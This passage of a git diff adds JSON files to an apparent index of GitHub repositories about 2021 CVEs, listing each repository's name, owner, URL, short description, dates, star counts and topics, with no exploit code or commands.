"user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2021-42561", + "description": "CVE-2021-42561: Command Injection via the Human Plugin in MITRE Caldera", + "fork": false, + "created_at": "2024-06-09T22:39:46Z", + "updated_at": "2024-06-09T22:57:08Z", + "pushed_at": "2024-06-09T22:42:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "authenticated", + "cve", + "cve-2021-42561", + "cves", + "remote-code-execution" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42562.json b/2021/CVE-2021-42562.json new file mode 100644 index 0000000000..9ba9f0d49d --- /dev/null +++ b/2021/CVE-2021-42562.json @@ -0,0 +1,40 @@ +[ + { + "id": 812801922, + "name": "CVE-2021-42562", + "full_name": "mbadanoiu\/CVE-2021-42562", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2021-42562", + "description": "CVE-2021-42562: Improper Access Control in MITRE Caldera", + "fork": false, + "created_at": "2024-06-09T23:04:45Z", + "updated_at": "2024-06-09T23:25:44Z", + "pushed_at": "2024-06-09T23:23:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "authenticated", + "cve", + "cve-2021-42562", + "cves", + "insecure-direct-object-reference" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42574.json b/2021/CVE-2021-42574.json new file mode 100644 index 0000000000..0e8b00824a --- /dev/null +++ b/2021/CVE-2021-42574.json @@ -0,0 +1,226 @@ +[ + { + "id": 423467826, + "name": "CVE-2021-42574", + "full_name": "shiomiyan\/CVE-2021-42574", + "owner": { + "login": "shiomiyan", + "id": 35842766, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35842766?v=4", + "html_url": "https:\/\/github.com\/shiomiyan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shiomiyan\/CVE-2021-42574", + "description": null, + "fork": false, + "created_at": "2021-11-01T13:05:48Z", + "updated_at": "2021-11-02T02:47:29Z", + "pushed_at": "2021-11-01T13:15:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 423551580, + "name": "CVE-2021-42574_and_CVE-2021-42694", + "full_name": "hffaust\/CVE-2021-42574_and_CVE-2021-42694", + "owner": { + "login": "hffaust", + "id": 15644021, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15644021?v=4", + "html_url": "https:\/\/github.com\/hffaust", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hffaust\/CVE-2021-42574_and_CVE-2021-42694", + "description": null, + "fork": false, + "created_at": "2021-11-01T17:13:50Z", + "updated_at": "2023-08-20T01:44:35Z", + "pushed_at": "2021-11-01T17:13:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 423899769, + "name": "CVE-2021-42574", + "full_name": "simplylu\/CVE-2021-42574", + "owner": { + "login": "simplylu", + "id": 55274241, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55274241?v=4", + "html_url": "https:\/\/github.com\/simplylu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/simplylu\/CVE-2021-42574", + "description": "Generate malicious files using recently published bidi-attack (CVE-2021-42574)", + "fork": false, + "created_at": "2021-11-02T15:32:38Z", + "updated_at": "2024-08-12T20:17:45Z", + "pushed_at": "2023-05-23T19:49:48Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 425359583, + "name": "bidi_char_detector", + "full_name": "maweil\/bidi_char_detector", + "owner": { + "login": "maweil", + "id": 16721506, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16721506?v=4", + "html_url": "https:\/\/github.com\/maweil", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maweil\/bidi_char_detector", + "description": "Checks your files for existence of Unicode BIDI characters which can be misused for supply chain attacks. See CVE-2021-42574 ", + "fork": false, + "created_at": "2021-11-06T22:12:35Z", + "updated_at": "2024-08-12T20:17:52Z", + "pushed_at": "2023-03-28T05:59:47Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-42574", + "docker", + "rust", + "security", + "supply-chain-attacks", + "unicode-characters" + ], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 431761296, + "name": "unicode-control-characters-action", + "full_name": "pierDipi\/unicode-control-characters-action", + "owner": { + "login": "pierDipi", + "id": 33736985, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33736985?v=4", + "html_url": "https:\/\/github.com\/pierDipi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pierDipi\/unicode-control-characters-action", + "description": "A GitHub Action to find Unicode control characters using the Red Hat diagnostic tool https:\/\/access.redhat.com\/security\/vulnerabilities\/RHSB-2021-007 to detect RHSB-2021-007 Trojan source attacks (CVE-2021-42574,CVE-2021-42694)", + "fork": false, + "created_at": "2021-11-25T08:02:31Z", + "updated_at": "2021-11-25T11:56:45Z", + "pushed_at": "2023-04-05T10:43:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 437216021, + "name": "CVE-2021-42574", + "full_name": "waseeld\/CVE-2021-42574", + "owner": { + "login": "waseeld", + "id": 33339924, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33339924?v=4", + "html_url": "https:\/\/github.com\/waseeld", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/waseeld\/CVE-2021-42574", + "description": null, + "fork": false, + "created_at": "2021-12-11T07:23:17Z", + "updated_at": "2021-12-11T07:31:14Z", + "pushed_at": "2021-12-11T07:28:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 595745234, + "name": "solidity_CVE-2021-42574-POC", + "full_name": "tin-z\/solidity_CVE-2021-42574-POC", + "owner": { + "login": "tin-z", + "id": 32848129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32848129?v=4", + "html_url": "https:\/\/github.com\/tin-z", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tin-z\/solidity_CVE-2021-42574-POC", + "description": "POC of CVE-2021-42574 for solidity and solc compiler", + "fork": false, + "created_at": "2023-01-31T18:15:00Z", + "updated_at": "2023-02-09T08:57:26Z", + "pushed_at": "2023-02-01T09:34:26Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42662.json b/2021/CVE-2021-42662.json new file mode 100644 index 0000000000..c6c0864f2e --- /dev/null +++ b/2021/CVE-2021-42662.json @@ -0,0 +1,33 @@ +[ + { + "id": 424326946, + "name": "CVE-2021-42662", + "full_name": "0xDeku\/CVE-2021-42662", + "owner": { + "login": "0xDeku", + "id": 93016131, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93016131?v=4", + "html_url": "https:\/\/github.com\/0xDeku", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xDeku\/CVE-2021-42662", + "description": "CVE-2021-42662 - Stored Cross-Site Scripting vulnerability in the Online event booking and reservation system. ", + "fork": false, + "created_at": "2021-11-03T17:51:55Z", + "updated_at": "2024-08-09T18:37:18Z", + "pushed_at": "2022-03-24T18:08:34Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42663.json b/2021/CVE-2021-42663.json new file mode 100644 index 0000000000..e5ab16b4f8 --- /dev/null +++ b/2021/CVE-2021-42663.json @@ -0,0 +1,33 @@ +[ + { + "id": 424343690, + "name": "CVE-2021-42663", + "full_name": "0xDeku\/CVE-2021-42663", + "owner": { + "login": "0xDeku", + "id": 93016131, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93016131?v=4", + "html_url": "https:\/\/github.com\/0xDeku", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xDeku\/CVE-2021-42663", + "description": "CVE-2021-42663 - HTML Injection vulnerability in the Online event booking and reservation system. ", + "fork": false, + "created_at": "2021-11-03T18:49:28Z", + "updated_at": "2024-08-20T14:10:26Z", + "pushed_at": "2022-03-24T18:09:07Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42664.json b/2021/CVE-2021-42664.json new file mode 100644 index 0000000000..88acd7d8e3 --- /dev/null +++ b/2021/CVE-2021-42664.json @@ -0,0 +1,33 @@ +[ + { + "id": 424354876, + "name": "CVE-2021-42664", + "full_name": "0xDeku\/CVE-2021-42664", + "owner": { + "login": "0xDeku", + "id": 93016131, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93016131?v=4", + "html_url": "https:\/\/github.com\/0xDeku", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xDeku\/CVE-2021-42664", + "description": " CVE-2021-42664 - Stored Cross-Site Scripting vulnerability in the Engineers online portal system.", + "fork": false, + "created_at": "2021-11-03T19:29:57Z", + "updated_at": "2024-08-09T18:34:11Z", + "pushed_at": "2022-03-24T18:09:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42665.json b/2021/CVE-2021-42665.json new file mode 100644 index 0000000000..8fa5826718 --- /dev/null +++ b/2021/CVE-2021-42665.json @@ -0,0 +1,33 @@ +[ + { + "id": 424362612, + "name": "CVE-2021-42665", + "full_name": "0xDeku\/CVE-2021-42665", + "owner": { + "login": "0xDeku", + "id": 93016131, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93016131?v=4", + "html_url": "https:\/\/github.com\/0xDeku", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xDeku\/CVE-2021-42665", + "description": "CVE-2021-42665 - SQL Injection authentication bypass vulnerability in the Engineers online portal system. ", + "fork": false, + "created_at": "2021-11-03T19:58:58Z", + "updated_at": "2024-08-09T18:34:51Z", + "pushed_at": "2022-03-24T18:09:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42666.json b/2021/CVE-2021-42666.json new file mode 100644 index 0000000000..c039927b3f --- /dev/null +++ b/2021/CVE-2021-42666.json @@ -0,0 +1,33 @@ +[ + { + "id": 424367205, + "name": "CVE-2021-42666", + "full_name": "0xDeku\/CVE-2021-42666", + "owner": { + "login": "0xDeku", + "id": 93016131, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93016131?v=4", + "html_url": "https:\/\/github.com\/0xDeku", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xDeku\/CVE-2021-42666", + "description": "CVE-2021-42666 - SQL Injection vulnerability in the Engineers online portal system. ", + "fork": false, + "created_at": "2021-11-03T20:14:58Z", + "updated_at": "2024-08-09T18:34:07Z", + "pushed_at": "2022-03-24T18:10:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42667.json b/2021/CVE-2021-42667.json new file mode 100644 index 0000000000..f970088a6b --- /dev/null +++ b/2021/CVE-2021-42667.json @@ -0,0 +1,33 @@ +[ + { + "id": 424371514, + "name": "CVE-2021-42667", + "full_name": "0xDeku\/CVE-2021-42667", + "owner": { + "login": "0xDeku", + "id": 93016131, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93016131?v=4", + "html_url": "https:\/\/github.com\/0xDeku", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xDeku\/CVE-2021-42667", + "description": "CVE-2021-42667 - SQL Injection vulnerability in the Online event booking and reservation system.", + "fork": false, + "created_at": "2021-11-03T20:31:30Z", + "updated_at": "2024-09-05T15:22:14Z", + "pushed_at": "2022-03-24T18:10:23Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42668.json b/2021/CVE-2021-42668.json new file mode 100644 index 0000000000..220c1364e2 --- /dev/null +++ b/2021/CVE-2021-42668.json @@ -0,0 +1,33 @@ +[ + { + "id": 424374708, + "name": "CVE-2021-42668", + "full_name": "0xDeku\/CVE-2021-42668", + "owner": { + "login": "0xDeku", + "id": 93016131, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93016131?v=4", + "html_url": "https:\/\/github.com\/0xDeku", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xDeku\/CVE-2021-42668", + "description": "CVE-2021-42668 - SQL Injection vulnerability in the Engineers online portal system. ", + "fork": false, + "created_at": "2021-11-03T20:43:30Z", + "updated_at": "2024-09-05T15:20:47Z", + "pushed_at": "2022-03-24T18:11:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42669.json b/2021/CVE-2021-42669.json new file mode 100644 index 0000000000..5fdb4bb2cb --- /dev/null +++ b/2021/CVE-2021-42669.json @@ -0,0 +1,33 @@ +[ + { + "id": 424376895, + "name": "CVE-2021-42669", + "full_name": "0xDeku\/CVE-2021-42669", + "owner": { + "login": "0xDeku", + "id": 93016131, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93016131?v=4", + "html_url": "https:\/\/github.com\/0xDeku", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xDeku\/CVE-2021-42669", + "description": "CVE-2021-42669 - Remote code execution via unrestricted file upload vulnerability in the Engineers online portal system.", + "fork": false, + "created_at": "2021-11-03T20:52:08Z", + "updated_at": "2024-09-05T15:18:19Z", + "pushed_at": "2022-07-12T20:00:14Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42670.json b/2021/CVE-2021-42670.json new file mode 100644 index 0000000000..b467fee227 --- /dev/null +++ b/2021/CVE-2021-42670.json @@ -0,0 +1,33 @@ +[ + { + "id": 424385119, + "name": "CVE-2021-42670", + "full_name": "0xDeku\/CVE-2021-42670", + "owner": { + "login": "0xDeku", + "id": 93016131, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93016131?v=4", + "html_url": "https:\/\/github.com\/0xDeku", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xDeku\/CVE-2021-42670", + "description": "CVE-2021-42670 - SQL Injection vulnerability in the Engineers online portal system. ", + "fork": false, + "created_at": "2021-11-03T21:25:43Z", + "updated_at": "2024-09-05T15:20:27Z", + "pushed_at": "2022-03-24T18:12:05Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42671.json b/2021/CVE-2021-42671.json new file mode 100644 index 0000000000..27bc7d1aa5 --- /dev/null +++ b/2021/CVE-2021-42671.json @@ -0,0 +1,33 @@ +[ + { + "id": 424387160, + "name": "CVE-2021-42671", + "full_name": "0xDeku\/CVE-2021-42671", + "owner": { + "login": "0xDeku", + "id": 93016131, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93016131?v=4", + "html_url": "https:\/\/github.com\/0xDeku", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xDeku\/CVE-2021-42671", + "description": "CVE-2021-42671 - Broken access control vulnerability in the Engineers online portal system. ", + "fork": false, + "created_at": "2021-11-03T21:34:23Z", + "updated_at": "2024-09-05T15:18:52Z", + "pushed_at": "2022-03-24T18:12:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42694.json b/2021/CVE-2021-42694.json new file mode 100644 index 0000000000..f872384e62 --- /dev/null +++ b/2021/CVE-2021-42694.json @@ -0,0 +1,33 @@ +[ + { + "id": 423992286, + "name": "CVE-2021-42694", + "full_name": "simplylu\/CVE-2021-42694", + "owner": { + "login": "simplylu", + "id": 55274241, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55274241?v=4", + "html_url": "https:\/\/github.com\/simplylu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/simplylu\/CVE-2021-42694", + "description": "Generate malicious files using recently published homoglyphic-attack (CVE-2021-42694)", + "fork": false, + "created_at": "2021-11-02T20:39:47Z", + "updated_at": "2024-08-12T20:17:45Z", + "pushed_at": "2023-05-23T19:49:04Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42697.json b/2021/CVE-2021-42697.json new file mode 100644 index 0000000000..fb19243fd6 --- /dev/null +++ b/2021/CVE-2021-42697.json @@ -0,0 +1,33 @@ +[ + { + "id": 484937723, + "name": "CVE-2021-42697", + "full_name": "cxosmo\/CVE-2021-42697", + "owner": { + "login": "cxosmo", + "id": 45860802, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45860802?v=4", + "html_url": "https:\/\/github.com\/cxosmo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cxosmo\/CVE-2021-42697", + "description": "Proof of concept exploit for CVE-2021-42697: Akka HTTP 10.1.x before 10.1.15 and 10.2.x before 10.2.7 can encounter stack exhaustion while parsing HTTP headers, which allows a remote attacker to conduct a Denial of Service attack by sending a User-Agent header with deeply nested comments.", + "fork": false, + "created_at": "2022-04-24T05:51:24Z", + "updated_at": "2022-05-03T22:53:57Z", + "pushed_at": "2022-06-26T17:48:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42717.json b/2021/CVE-2021-42717.json new file mode 100644 index 0000000000..8286314bba --- /dev/null +++ b/2021/CVE-2021-42717.json @@ -0,0 +1,33 @@ +[ + { + "id": 568496317, + "name": "Detection-and-Mitigation-script-for-CVE-2021-42717", + "full_name": "EkamSinghWalia\/Detection-and-Mitigation-script-for-CVE-2021-42717", + "owner": { + "login": "EkamSinghWalia", + "id": 106553324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106553324?v=4", + "html_url": "https:\/\/github.com\/EkamSinghWalia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EkamSinghWalia\/Detection-and-Mitigation-script-for-CVE-2021-42717", + "description": "Detection and Mitigation script for CVE-2021-42717 -> ModSecurity DoS Vulnerability in JSON Parsing ", + "fork": false, + "created_at": "2022-11-20T18:01:34Z", + "updated_at": "2022-11-20T18:14:53Z", + "pushed_at": "2022-11-20T18:22:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42756.json b/2021/CVE-2021-42756.json new file mode 100644 index 0000000000..918d333336 --- /dev/null +++ b/2021/CVE-2021-42756.json @@ -0,0 +1,33 @@ +[ + { + "id": 605630069, + "name": "CVE-2021-42756", + "full_name": "3ndorph1n\/CVE-2021-42756", + "owner": { + "login": "3ndorph1n", + "id": 126174263, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/126174263?v=4", + "html_url": "https:\/\/github.com\/3ndorph1n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3ndorph1n\/CVE-2021-42756", + "description": null, + "fork": false, + "created_at": "2023-02-23T15:10:06Z", + "updated_at": "2023-02-23T15:10:49Z", + "pushed_at": "2023-02-23T15:10:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42835.json b/2021/CVE-2021-42835.json new file mode 100644 index 0000000000..d331a7ce0e --- /dev/null +++ b/2021/CVE-2021-42835.json @@ -0,0 +1,33 @@ +[ + { + "id": 434362567, + "name": "PlEXcalaison", + "full_name": "netanelc305\/PlEXcalaison", + "owner": { + "login": "netanelc305", + "id": 50978770, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50978770?v=4", + "html_url": "https:\/\/github.com\/netanelc305", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/netanelc305\/PlEXcalaison", + "description": "Plex media server local privilige escalation poc - CVE-2021-42835", + "fork": false, + "created_at": "2021-12-02T20:18:08Z", + "updated_at": "2022-05-24T10:08:43Z", + "pushed_at": "2021-12-22T07:48:01Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42913.json b/2021/CVE-2021-42913.json new file mode 100644 index 0000000000..1b20aff50d --- /dev/null +++ b/2021/CVE-2021-42913.json @@ -0,0 +1,33 @@ +[ + { + "id": 440389065, + "name": "CVE-2021-42913", + "full_name": "kernel-cyber\/CVE-2021-42913", + "owner": { + "login": "kernel-cyber", + "id": 21226709, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21226709?v=4", + "html_url": "https:\/\/github.com\/kernel-cyber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kernel-cyber\/CVE-2021-42913", + "description": "Samsung Printer SCX-6X55X Improper Access Control", + "fork": false, + "created_at": "2021-12-21T04:26:11Z", + "updated_at": "2021-12-21T04:51:08Z", + "pushed_at": "2021-12-21T04:51:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42948.json b/2021/CVE-2021-42948.json new file mode 100644 index 0000000000..4b8fb6c8d2 --- /dev/null +++ b/2021/CVE-2021-42948.json @@ -0,0 +1,33 @@ +[ + { + "id": 461312246, + "name": "HotelDruid-CVE-2021-42948", + "full_name": "dhammon\/HotelDruid-CVE-2021-42948", + "owner": { + "login": "dhammon", + "id": 69738058, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69738058?v=4", + "html_url": "https:\/\/github.com\/dhammon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dhammon\/HotelDruid-CVE-2021-42948", + "description": null, + "fork": false, + "created_at": "2022-02-19T21:01:12Z", + "updated_at": "2022-02-19T21:01:12Z", + "pushed_at": "2022-02-19T21:01:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-42949.json b/2021/CVE-2021-42949.json new file mode 100644 index 0000000000..c72e7aa5ea --- /dev/null +++ b/2021/CVE-2021-42949.json @@ -0,0 +1,33 @@ +[ + { + "id": 461312502, + "name": "HotelDruid-CVE-2021-42949", + "full_name": "dhammon\/HotelDruid-CVE-2021-42949", + "owner": { + "login": "dhammon", + "id": 69738058, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69738058?v=4", + "html_url": "https:\/\/github.com\/dhammon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dhammon\/HotelDruid-CVE-2021-42949", + "description": null, + "fork": false, + "created_at": "2022-02-19T21:02:42Z", + "updated_at": "2022-02-19T21:02:42Z", + "pushed_at": "2022-02-19T21:03:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43008.json b/2021/CVE-2021-43008.json new file mode 100644 index 0000000000..6799d63ea4 --- /dev/null +++ b/2021/CVE-2021-43008.json @@ -0,0 +1,45 @@ +[ + { + "id": 437963460, + "name": "CVE-2021-43008-AdminerRead", + "full_name": "p0dalirius\/CVE-2021-43008-AdminerRead", + "owner": { + "login": "p0dalirius", + "id": 79218792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79218792?v=4", + "html_url": "https:\/\/github.com\/p0dalirius", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p0dalirius\/CVE-2021-43008-AdminerRead", + "description": "Exploit tool for CVE-2021-43008 Adminer 1.0 up to 4.6.2 Arbitrary File Read vulnerability ", + "fork": false, + "created_at": "2021-12-13T17:26:49Z", + "updated_at": "2024-10-16T10:54:23Z", + "pushed_at": "2024-03-16T08:25:52Z", + "stargazers_count": 78, + "watchers_count": 78, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "adminer", + "bugbounty", + "cve", + "cve-2021-43008", + "exploit", + "file", + "hacking", + "pentest", + "read", + "tool", + "vulnerability" + ], + "visibility": "public", + "forks": 14, + "watchers": 78, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43032.json b/2021/CVE-2021-43032.json new file mode 100644 index 0000000000..cf5491e43a --- /dev/null +++ b/2021/CVE-2021-43032.json @@ -0,0 +1,38 @@ +[ + { + "id": 422599372, + "name": "CVE-2021-43032", + "full_name": "SakuraSamuraii\/CVE-2021-43032", + 